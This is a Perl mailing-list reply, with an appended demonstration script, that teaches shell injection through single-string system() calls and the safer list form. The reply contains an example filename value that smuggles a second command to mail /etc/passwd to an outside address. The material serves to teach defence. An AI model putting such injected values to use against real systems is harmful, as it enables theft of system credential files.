On Jan 12, Gary Hawkins said:
>> system("rm -rf $file");
>>
>> But if you copied this from another source, that source was totally
>> unaware that deletion of files like THAT is TOTALLY unsafe. A safer
>> approach is:
>>
>> system("rm", "-rf", $file);
>
>I'm not aware of the reason for it.

Multi-arg system() bypasses the shell. Assume that $file comes from user
input. What would happen if the user entered

  foo; mail [EMAIL PROTECTED] < /etc/passwd

when prompted for a filename? You would then blindly run

  system("rm -rf $file");

which would execute

  rm -rf foo;
  mail [EMAIL PROTECTED] < /etc/passwd

which would happily email me your passwd file. Ick for you.

Multi-arg system treats the program to execute as though it were a
function itself -- it safely executes 'rm' with two arguments, the flags
(-rf) and the filename (foo; mail [EMAIL PROTECTED] < /etc/passwd). This,
of course, would fail, unless you HAPPENED to have a file named "foo; mail
[EMAIL PROTECTED] < /etc/passwd", which would be truly bizarre.

>What's a good way to find which perl doc contains the thing I need to read
>about?
>
>This will prolly make me look stupider than I wasn't to be of something then
>of, but:
>
>C:\>perldoc system
>No documentation found for "system".

You need to better familiarize yourself with the perldoc utility.

  friday:~ $ perldoc
  Usage: perldoc [-h] [-r] [-i] [-v] [-t] [-u] [-m] [-l] [-F] [-X]
  PageName|ModuleName|ProgramName
  perldoc -f PerlFunc
  perldoc -q FAQKeywords
  The -h option prints more help. Also try "perldoc perldoc" to get
  aquainted with the system.

From that message, you see that you should have invoked 'perldoc -f
system' instead.

--
Jeff "japhy" Pinyan [EMAIL PROTECTED] http://www.pobox.com/~japhy/
RPI Acacia brother #734 http://www.perlmonks.org/ http://www.cpan.org/
** Look for "Regular Expressions in Perl" published by Manning, in 2002 **
<stu> what does y/// stand for? <tenderpuss> why, yansliterate of course.
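
The difference between the two system() forms described in the message above, as an added example that is not part of the original post. It assumes a POSIX system with /bin/sh, rm and touch; the marker file name INJECTED and the helpers setup and report are made up for the illustration, and the hostile filename is constructed to run only a harmless command.

```perl
use strict;
use warnings;
use File::Temp qw(tempdir);

# Work inside a throwaway directory so only scratch files are touched.
my $dir = tempdir(CLEANUP => 1);
chdir $dir or die "chdir $dir: $!";

# Constructed hostile "filename": a shell separator followed by a harmless
# command that only creates a marker file.
my $file = 'foo; touch INJECTED';

# Create a plain 'foo' and a file whose name is literally $file.
sub setup {
    unlink 'INJECTED';
    for my $name ('foo', $file) {
        open my $fh, '>', $name or die "create '$name': $!";
        close $fh;
    }
}

sub report {
    my ($label) = @_;
    printf "%-12s foo:%-4s literal name:%-4s injected command ran:%s\n",
        $label,
        (-e 'foo'      ? 'kept' : 'gone'),
        (-e $file      ? 'kept' : 'gone'),
        (-e 'INJECTED' ? 'YES'  : 'no');
}

# 1. One string: Perl sees shell metacharacters and runs /bin/sh -c "...",
#    so the shell splits the value at ';' and runs both commands.
setup();
system("rm -f $file");
report('string form');

# 2. List: rm is exec'd directly and $file is a single argv entry.
setup();
system('rm', '-f', $file);
report('list form');

# 3. The list form still lets rm parse a leading '-' as an option, so end
#    option parsing with '--', or skip the external program and use unlink.
setup();
system('rm', '-f', '--', $file) == 0 or warn "rm exited with status $?\n";
unlink 'foo' or warn "unlink foo: $!";
report('-- / unlink');

chdir '/';    # leave the scratch directory so it can be cleaned up
```

For deleting files from Perl, the built-in unlink (or File::Path for directory trees) avoids starting an external program at all.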